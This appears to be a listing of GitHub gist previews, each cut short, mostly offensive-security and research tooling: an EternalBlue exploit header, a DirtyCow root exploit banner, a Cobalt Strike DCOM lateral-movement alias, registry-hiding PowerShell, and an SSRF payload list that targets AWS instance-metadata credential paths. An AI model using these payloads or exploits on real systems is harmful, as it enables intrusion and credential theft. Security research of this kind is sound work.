brianreitz

# requires PSReflect.ps1 to be in the same directory as this script
. .\PSReflect.ps1

$Module = New-InMemoryModule -ModuleName RegHide
# Define our structs. 

# https://msdn.microsoft.com/en-us/library/windows/hardware/ff564879(v=vs.85).aspx
# typedef struct _UNICODE_STRING {
#  USHORT Length;
#  USHORT MaximumLength;

worawit

#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket

'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)

001SPARTaN

# Lateral movement techniques based on research by enigma0x3 (Matt Nelson)
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
# https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
# Beacon implementation based on comexec.cna by Raphael Mudge
# https://gist.github.com/rsmudge/8b2f699ea212c09201a5cb65650c6fa2

# Register alias
beacon_command_register ("dcom_shellexecute", "Lateral movement with DCOM (ShellExecute)",
                        "Usage: dcom_shellexecute [target] [listener]\n\n" .
                        "Spawn new Beacon on a target via DCOM ShellExecute Object.");

moyix

To get the docker images:

docker pull klee/klee

docker pull angr/angr

KLEE

Start docker:

KrE80r

/*
* A PTRACE_POKEDATA variant of CVE-2016-5195
* should work on RHEL 5 & 6
* 
* (un)comment correct payload (x86 or x64)!
* $ gcc -pthread c0w.c  -o c0w
* $ ./c0w
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* mmap fa65a000

mattifestation

# Ensure System.Security assembly is loaded.
Add-Type -AssemblyName System.Security

function ConvertTo-CIPolicy {
<#
.SYNOPSIS

Converts a binary file that contains a Code Integrity policy into XML format.

Author: Matthew Graeber (@mattifestation)

mattifestation

#region Win10IoT Audit Code
$CimSession = New-CimSession -ComputerName Win10IoT -Credential Administrator -Authentication Negotiate
Get-CimInstance -ClassName Win32_OperatingSystem -CimSession $CimSession
Get-CimInstance -ClassName Win32_Service -Filter 'Name = "InputService"' -CimSession $CimSession | Format-List *

# Run the service audit function in CimSweep
$ServicePermissions = Get-CSVulnerableServicePermission -CimSession $CimSession
$ServicePermissions | Where-Object { $_.GroupName -eq 'NT AUTHORITY\Authenticated Users' }

# The fact that Authenticated Users can change the service configuration means that

BuffaloWill

## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]

## AWS 
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]

paragonie-scott

Hello software developers,

Please check your code to ensure you're not making one of the following mistakes related to cryptography.

I. General Mistakes

• Writing your own home-grown cryptography primitives (For example: Mifare Classic)
  • Exception: For the sake of learning, but don't deploy it in production.
• Using a fast hash function (e.g. MD5, SHA256) for storing passwords. Use bcrypt instead.
• Not using a cryptographically secure random number generator

decidedlygray

#!/usr/bin/python

import sys
import time
from sulley import *


#######################################################################
""" Receive banner when connecting to server. """
def banner(sock):